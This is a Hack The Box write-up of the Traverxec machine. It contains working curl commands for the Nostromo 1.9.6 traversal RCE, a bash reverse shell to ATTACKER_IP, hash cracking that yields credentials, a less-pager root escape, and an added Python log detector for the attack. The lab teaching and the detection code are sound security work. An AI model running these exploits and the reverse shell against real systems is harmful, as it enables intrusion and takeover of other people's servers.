Traverxec (HTB – Easy)

Traverxec runs the vulnerable Nostromo web server, which can be exploited for remote command execution. The initial foothold is obtained via a public Nostromo RCE, followed by pivoting into the david user through configuration leakage and protected web content. Privilege escalation is achieved by abusing journalctl running in a pager (less) with root privileges.

Overview

Target: traverxec.htb
Initial vector: Nostromo 1.9.6 RCE
Lateral movement: leaked credentials → SSH key for user david
Privilege escalation: journalctl → less escape → root shell

Enumeration

Nmap:

22/tcp ssh (OpenSSH 7.9p1)
80/tcp http (nostromo 1.9.6)

The web server is Nostromo 1.9.6, which is known to be vulnerable to RCE. Searchsploit lists multiple exploits for this version.

Foothold – Nostromo 1.9.6 RCE

The exploit combines a path traversal with command execution: the crafted URL traverses out of the web root to /bin/sh, and the POST body supplies the command to run. Example manual usage with curl:

$ curl -s -X POST "http://traverxec.htb/.%0d./.%0d./.%0d./.%0d./.%0d./bin/sh" \
  -d "/usr/bin/id"

To get a reverse shell:

$ curl -s -X POST "http://traverxec.htb/.%0d./.%0d./.%0d./.%0d./.%0d./bin/sh" \
  -d "/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/777 0>&1'"

Listener:

$ nc -nlvp 777

A shell is obtained as the web server user, but user.txt is not yet accessible.
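
The traversal request shown above leaves a recognizable trace in access logs. The following Python detector is an added example, not part of the original write-up or of Nostromo: it percent-decodes each request path, flags control characters, and checks whether the path escapes the web root once those characters are dropped. The Common Log Format lines are constructed sample data, and the model of a server discarding control bytes after its traversal check is an assumption.

```python
import re
from urllib.parse import unquote_to_bytes

# Constructed sample access-log lines in Common Log Format (not from the target).
SAMPLE_LOG = """\
10.10.14.5 - - [01/Jan/2020:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 15674
10.10.14.5 - - [01/Jan/2020:10:00:07 +0000] "POST /.%0d./.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1" 200 0
10.10.14.9 - - [01/Jan/2020:10:01:12 +0000] "GET /img/..%2f..%2fetc/passwd HTTP/1.1" 404 0
10.10.14.9 - - [01/Jan/2020:10:02:30 +0000] "GET /docs/../index.html HTTP/1.1" 200 15674
10.10.14.7 - - [01/Jan/2020:10:03:00 +0000] "GET /~david/ HTTP/1.1" 200 402
"""

REQUEST_RE = re.compile(r'^(\S+) .*?"([A-Z]+) (\S+) HTTP/[\d.]+"')
CONTROL_BYTES = bytes(range(0x20)) + b"\x7f"

def classify_path(raw_target):
    """Return a list of reasons the request path is suspicious (empty if clean)."""
    path = unquote_to_bytes(raw_target.split("?", 1)[0])
    reasons = []
    if any(b in CONTROL_BYTES for b in path):
        reasons.append("control-char-in-path")
    # Assumption: model a server that drops control bytes after its own
    # traversal check, so ".\r./" collapses to "../".
    cleaned = path.translate(None, CONTROL_BYTES)
    depth = 0
    for segment in cleaned.split(b"/"):
        if segment == b"..":
            depth -= 1
            if depth < 0:
                reasons.append("escapes-web-root")
                break
        elif segment not in (b"", b"."):
            depth += 1
    return reasons

def scan(log_text):
    """Return (client, method, target, reasons) for each suspicious request line."""
    findings = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        reasons = classify_path(m.group(3)) if m else []
        if reasons:
            findings.append((m.group(1), m.group(2), m.group(3), reasons))
    return findings

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

The benign /docs/../index.html request is not reported because it never climbs above the web root, which keeps the rule usable on real traffic.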

Lateral Movement – User david

Inspect Nostromo configuration:

$ cd /var/nostromo/conf
$ cat nhttpd.conf

The config shows that homedirs is in use, meaning per-user web content is served from:

http://traverxec.htb/~david

Also in /var/nostromo/conf is a hashed password file. Crack it with John:

$ john --wordlist=/usr/share/wordlists/rockyou.txt hash
-> david : Nowonly4me

Browse to:

http://traverxec.htb/~david/public_www/protected-file-area

Authenticate with david / Nowonly4me and download the backup archive. Extract it:

$ tar -xf backup-ssh-identity-files.tgz

Inside is id_rsa for user david, protected by a passphrase. Convert it to a hash John can read and crack it:

$ ssh2john id_rsa > hash2
$ john --wordlist=/usr/share/wordlists/rockyou.txt hash2
-> hunter

SSH as david:

$ ssh -i id_rsa david@traverxec.htb

Now user.txt is accessible.

Privilege Escalation – journalctl / less Escape

Enumerate david’s home:

$ ls
bin

Inside bin is a script that runs journalctl with sudo (or via a wrapper). Running it opens the output in the less pager. From within less, spawn a shell:

!/bin/bash

Because journalctl is executed with elevated privileges, the pager and any shell it spawns inherit them, so the spawned shell is root.

Conclusion

Traverxec is a tight chain: Nostromo RCE for initial access, configuration and web content leakage to pivot into user david, and a classic journalctl/less escape for root. It’s a great example of combining web exploitation, password cracking, and Unix privilege escalation tricks.